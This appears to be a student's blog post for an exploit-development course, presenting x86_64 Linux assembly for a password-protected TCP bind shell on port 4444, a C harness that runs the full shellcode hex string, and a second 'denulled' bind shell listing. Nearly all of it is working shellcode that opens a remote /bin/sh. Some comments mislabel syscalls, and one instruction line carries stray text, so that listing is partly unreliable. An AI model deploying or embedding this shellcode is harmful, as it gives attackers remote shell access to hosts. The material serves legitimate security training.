    syscall             ; make the call to socket
                        ; socketid will be in rax

    ; SYS_BIND      bind(2)

    ; rax : sys_bind 49
    ; rdi : socketid which will be in rax initially
    ; rsi : struct sokaddr *umyaddr
    ; rdx : int addrlen

    xchg rdi, rax       ; move socketid into rdi

    xor rax, rax        ; zero out rax

                        ; rdi already contains socketid
    mov rsi, rax        ; zeroing out rsi
    mov rdx, rsi        ; zeroing out rdx

    xor r9, r9          ; zero out r9
    push r9             ; pushing 0.0.0.0 into in_addr
    push word 0x5C11    ; port number (least significant 
                        ; byte first ... 0x115C is 4444)
    push word 0x02      ; AF_INET - which is 0x02

    mov rsi, rsp        ; moving stack address to rsi

    add rdx, 16         ; 16 byts long (or 32bit)

    add rax, 49         ; set rax to sys_bind

    syscall             ; make the call to bind
                        ; socketid will be in rax

    ; SYS_LISTEN    listen(2)

    ; rax : sys_listen 50
    ; rdi : socketid which is already in rdi
    ; rsi : int backlog

    xor rax, rax        ; zero out rax

                        ; socketid already in rsi
    mov rdx, rax        ; zeroing out rdx
    add rdx, 0x01       ; moving backlog number to rdx

    add rax, 50         ; setting rax to sys_listen

    syscall             ; make call to listen

    ; SYS_ACCEPT    accept(2)
    ; Returns clientid needed for dup2

    ; rax : sys_accept 43
    ; rdi : socketid already in rdi
    ; rsi : struct sockaddr *upeer_sockaddr
    ; rdx : int *upeer_addrlen

    xor rax, rax        ; zero out rax

                        ; socketid already in rsi
    mov rsi, rax        ; moving null to rsi
    mov rdx, rax        ; moving null to rdx

    add rax, 43         ; setting rax to sys_connect

    syscall             ; make call to listen

    ; sys_dup2

    xchg rdi, rax       ; moves clientid to rdi

    ; rax : sys_dup2 33
    ; rdi : already contains clientid
    ; rsi : 1 to 3 in loop

    xor r9, r9          ; zeroing out loop counter

    loopin:
        xor rax, rax    ; zero out rax
        add rax, 33     ; setting rax to sys_dup2
        mov rsi, r9     ; move fileid to duplicate
        syscall         ; call dup2
        inc r9          ; increase r9 by 0x01
        cmp r9, 3       ; compare r9 to 0x03
        jne loopin

    ; We need to check for password here
    ; 1. ask for password
    ; 2. check password
    ; sys_read

    ; letup loop to checking the password
    checkpassword:

        ; sys_write
        ; rax : 1
        ; rdi : unsigned int fd : 1 for stdout
        ; rsi : const char *buf : string
        ; rdx : size_t count : how big

        xor rax, rax                  ; zero out rax
        mov rdx, rax                  ; zero out rdx
        inc rax                       ; increase rax to 1
        mov rdi, rax                  ; move 1 into rdi
        lea rsi, [rel enter_password] ; moving enter_password
        add rdx, 39                   ; setting size enter_password

        syscall

        ; sys_read
        ; rdi : unsigned int fd : 0 for stdin
        ; rsi : char *buf : stack?
        ; rdx : size_t count : how big

        xor rax, rax ; zero out rax
        mov rdi, rax ; zero out rdi
        mov rdx, rax ; zero out rdx

        ; leave rax alone since read is 0
        mov rsi, rsp    ; set buffer to stack
        add rdx, 8      ; setting size of Password

        syscall ; calling read

        mov rdi, rsp                ; setting rdi to input buffer
        mov rax, 0x64726f7773736150 ; moving Password into buffer
        scasd                       ; scanning for a match
        jne checkpassword           ; if not a match then re-ask for password

    ; sys_execve

    ; rax : sys_execve 59
    ; rdi : const char *filename
    ; rsi : const char *const argv[]
    ; rdx : const char *const envp[]

    xor rax, rax        ; zeroing out rax
    add rax, 59         ; setting rax to sys_execve

    xor r9, r9          ; zeroing out r9
    push r9             ; pushing null to stack

    mov rbx, 0x68732f6e69622f2f     ; moving "//bin/sh"
    push rbx                        ; pushing "//bin/sh"

    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ;rsp now looks like: "//bin/sh,0x0000000000000000";
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

    mov rdi, rsp        ; moving the param to rdi
                        ; rdi now contains "//bin/sh,0x0000000000000000"

    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ; now we look like: execve("//bin/sh,0x0000000000000000", NOT-SET-YET, NOT-SET-YET);
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

    ; now we need to get 0x0000000000000000 into rdx
    push r9             ; r9 is still 0x0000000000000000 so push it to rsp
    mov rdx, rsp        ; we need to move a 0x0000000000000000 into
                        ; the third parameter in rdx

    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ; now we look like: execve("//bin/sh,0x0000000000000000", NOT-SET-YET, 0x0000000000000000);
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

    ; the second parameter is needs to be "//bin/sh,0x0000000000000000"
    ; which we can accomplish by moving rdi onto the stack
    ; and then moving rsp into rsi since it will be on the stack

    push rdi            ; pushing "//bin/sh,0x0000000000000000" back to the stack
    mov  rsi, rsp       ; moving the address of rdi (on the stack) to ecx

    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ; now we look like: execve("//bin/sh,0x00000000000000000", *"//bin/sh,0x0000000000000000", 0x0000000000000000);
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

    syscall             ; calling sys_execve
https://github.com/securitychops/security-tube-slae64/blob/master/assignment-1/shell-bind.nasm


Final C Program To Execute Shellcode (Part 1)

// Student ID   : SLAE64-1611
// Student Name : Jonathan "Chops" Crosby
// Assignment 1 : Shell Bind TCP (Linux/x86_64) Assembly
// File Name    : shellcode.c

#include<stdio.h>
#include<string.h>

//compile with: gcc shellcode.c -o shellcode -fno-stack-protector -z execstack

unsigned char code[] = \
"\xeb\x28\x45\x6e\x74\x65\x72\x20\x74\x68\x65\x20\x73\x65\x63\x72\x65\x74\x20\x70\x61\x73\x73\x77\x6f\x72\x64\x20\x74\x6f\x20\x63\x6f\x6e\x74\x69\x6e\x75\x65\x3a\x20\x0a\x48\x31\xc0\x48\x89\xc7\x48\x89\xfe\x48\x89\xf2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x97\x48\x31\xc0\x48\x89\xc6\x48\x89\xf2\x4d\x31\xc9\x41\x51\x66\x68\x11\x5c\x66\x6a\x02\x48\x89\xe6\x48\x83\xc2\x10\x48\x83\xc0\x31\x0f\x05\x48\x31\xc0\x48\x89\xc2\x48\x83\xc2\x01\x48\x83\xc0\x32\x0f\x05\x48\x31\xc0\x48\x89\xc6\x48\x89\xc2\x48\x83\xc0\x2b\x0f\x05\x48\x97\x4d\x31\xc9\x48\x31\xc0\x48\x83\xc0\x21\x4c\x89\xce\x0f\x05\x49\xff\xc1\x49\x83\xf9\x03\x75\xeb\x48\x31\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc7\x48\x8d\x35\x4e\xff\xff\xff\x48\x83\xc2\x27\x0f\x05\x48\x31\xc0\x48\x89\xc7\x48\x89\xc2\x48\x89\xe6\x48\x83\xc2\x08\x0f\x05\x48\x89\xe7\x48\xb8\x50\x61\x73\x73\x77\x6f\x72\x64\xaf\x75\xc5\x48\x31\xc0\x48\x83\xc0\x3b\x4d\x31\xc9\x41\x51\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x41\x51\x48\x89\xe2\x57\x48\x89\xe6\x0f\x05";

main()
{
    printf("Shellcode Length:  %d\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
}
https://github.com/securitychops/security-tube-slae64/blob/master/assignment-1/shellcode.c


Their Bind Shell Assembly Code After We DeNulled It in x86_64 (Part 2)

global _start


_start:

	; sock = socket(AF_INET, SOCK_STREAM, 0)
	; AF_INET = 2
	; SOCK_STREAM = 1
	; syscall number 41 

	xor rax, rax
	mov rdi, rax
	mov rsi, rax
	mov rdx, rax
	add rax, 41
	add rdi, 2
	inc rsi
	syscall

	; copy socket descriptor to rdi for future use 

	mov rdi, rax

	; server.sin_family = AF_INET 
	; server.sin_port = htons(PORT)
	; server.sin_addr.s_addr = INADDR_ANY
	; bzero(&server.sin_zero, 8)

	xor rax, rax 

	push rax

	mov dword [rsp-4], eax
	mov word [rsp-6], 0x5c11
	mov word [rsp-8], 0x2
	sub rsp, 8

	; bind(sock, (struct sockaddr *)&server, sockaddr_len)
	; syscall number 49

	xor rax, rax
	mov rdx, rax
	add rax, 49
	
	mov rsi, rsp
	add rdx, 16
	syscall

	; listen(sock, MAX_CLIENTS)
	; syscall number 50

	xor rax, rax
	mov rsi, rax
	add rax, 50
	add rsi, 2
	syscall

	; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
	; syscall number 43
	
	xor rax, rax
	mov rsi, rax
	add rax, 43
	sub rsp, 16
	mov rsi, rsp
        mov byte [rsp-1], 16
        sub rsp, 1
        mov rdx, rsp

        syscall

	; store the client socket description 
	mov r9, rax 

        ; close parent

	xor rax, rax
	add rax, 3
        syscall

        ; duplicate sockets

        ; dup2 (new, old)
        mov rdi, r9
	xor rax, rax
	mov rsi, rax
        add rax, 33
        syscall

        add rax, 33
        add rsi, 1
        syscall

	xor rax, rax
	mov rsi, rax
        add rax, 33 in x86_64 
        add rsi, 2
        syscall

        ; execve

        ; First NULL push

        xor rax, rax
        push rax

        ; push /bin//sh in reverse

        mov rbx, 0x68732f2f6e69622f
        push rbx

        ; store /bin//sh address in RDI

        mov rdi, rsp

        ; Second NULL push
        push rax

        ; set RDX
        mov rdx, rsp

        ; Push address of /bin//sh
        push rdi

        ; set RSI

        mov rsi, rsp

        ; Call the Execve syscall
        add rax, 59
        syscall

Jonathan Crosby

growing my chops in cybersecurity